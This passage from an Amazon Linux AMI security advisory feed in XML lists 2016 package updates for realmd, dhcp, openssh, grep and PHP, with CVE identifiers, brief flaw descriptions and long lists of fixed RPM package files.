realmd</title><issued date="2016-01-18 11:00:00" /><updated date="2016-01-18 11:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2704:
A flaw was found in the way realmd parsed certain input when writing configuration into the sssd.conf or smb.conf file. A remote attacker could use this flaw to inject arbitrary configurations into these files via a newline character in an LDAP response.
1205752:
CVE-2015-2704 realmd: untrusted data is used when configuring sssd.conf and/or smb.conf
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2704" title="" id="CVE-2015-2704" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="realmd-devel-docs" version="0.16.1" release="5.5.amzn1" epoch="0" arch="noarch"><filename>Packages/realmd-devel-docs-0.16.1-5.5.amzn1.noarch.rpm</filename></package><package name="realmd-debuginfo" version="0.16.1" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/realmd-debuginfo-0.16.1-5.5.amzn1.x86_64.rpm</filename></package><package name="realmd" version="0.16.1" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/realmd-0.16.1-5.5.amzn1.x86_64.rpm</filename></package><package name="realmd-debuginfo" version="0.16.1" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/realmd-debuginfo-0.16.1-5.5.amzn1.i686.rpm</filename></package><package name="realmd" version="0.16.1" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/realmd-0.16.1-5.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-637</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-637: medium priority package update for dhcp</title><issued date="2016-01-18 11:00:00" /><updated date="2016-01-18 11:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8605:
1297314:
CVE-2015-8605 dhcp: UDP payload length not properly checked
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8605" title="" id="CVE-2015-8605" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dhcp-common" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-common-4.1.1-43.P1.22.amzn1.x86_64.rpm</filename></package><package name="dhclient" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhclient-4.1.1-43.P1.22.amzn1.x86_64.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-devel-4.1.1-43.P1.22.amzn1.x86_64.rpm</filename></package><package name="dhcp" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-4.1.1-43.P1.22.amzn1.x86_64.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-debuginfo-4.1.1-43.P1.22.amzn1.x86_64.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-debuginfo-4.1.1-43.P1.22.amzn1.i686.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-devel-4.1.1-43.P1.22.amzn1.i686.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-common-4.1.1-43.P1.22.amzn1.i686.rpm</filename></package><package name="dhcp" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-4.1.1-43.P1.22.amzn1.i686.rpm</filename></package><package name="dhclient" version="4.1.1" release="43.P1.22.amzn1" epoch="12" arch="i686"><filename>Packages/dhclient-4.1.1-43.P1.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-638</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-638: medium priority package update for openssh</title><issued date="2016-01-18 11:00:00" /><updated date="2016-01-18 11:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0778:
A buffer overflow flaw was found in the way the OpenSSH client roaming feature was implemented. A malicious server could potentially use this flaw to execute arbitrary code on a successfully authenticated OpenSSH client if that client used certain non-default configuration options.
1298033:
CVE-2016-0778 OpenSSH: Client buffer-overflow when using roaming connections
CVE-2016-0777:
An information leak flaw was found in the way the OpenSSH client roaming feature was implemented. A malicious server could potentially use this flaw to leak portions of memory (possibly including private SSH keys) of a successfully authenticated OpenSSH client.
1298032:
CVE-2016-0777 OpenSSH: Client Information leak due to use of roaming connection feature
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0777" title="" id="CVE-2016-0777" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0778" title="" id="CVE-2016-0778" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pam_ssh_agent_auth" version="0.9.3" release="9.23.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.23.59.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-6.6.1p1-23.59.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-6.6.1p1-23.59.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-6.6.1p1-23.59.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-6.6.1p1-23.59.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-6.6.1p1-23.59.amzn1.x86_64.rpm</filename></package><package name="openssh" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-6.6.1p1-23.59.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-6.6.1p1-23.59.amzn1.i686.rpm</filename></package><package name="openssh" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-6.6.1p1-23.59.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-6.6.1p1-23.59.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="9.23.59.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.23.59.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-6.6.1p1-23.59.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-6.6.1p1-23.59.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="6.6.1p1" release="23.59.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-6.6.1p1-23.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-639</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-639: low priority package update for grep</title><issued date="2016-01-18 11:00:00" /><updated date="2016-01-18 11:00:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1345:
A heap-based buffer overflow flaw was found in the way grep processed certain pattern and text combinations. An attacker able to trick a user into running grep on specially crafted input could use this flaw to crash grep or, potentially, read from uninitialized memory.
1183651:
CVE-2015-1345 grep: heap buffer overrun
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1345" title="" id="CVE-2015-1345" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="grep-debuginfo" version="2.20" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/grep-debuginfo-2.20-1.16.amzn1.x86_64.rpm</filename></package><package name="grep" version="2.20" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/grep-2.20-1.16.amzn1.x86_64.rpm</filename></package><package name="grep-debuginfo" version="2.20" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/grep-debuginfo-2.20-1.16.amzn1.i686.rpm</filename></package><package name="grep" version="2.20" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/grep-2.20-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-640</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-640: medium priority package update for php56 php55</title><issued date="2016-01-18 11:00:00" /><updated date="2016-01-18 11:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1903:
1297717:
CVE-2016-1903 php: Out-of-bounds memory read via gdImageRotateInterpolated
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1903" title="" id="CVE-2016-1903" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-mbstring" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.31-1.111.amzn1.i686.rpm</filename></package><package 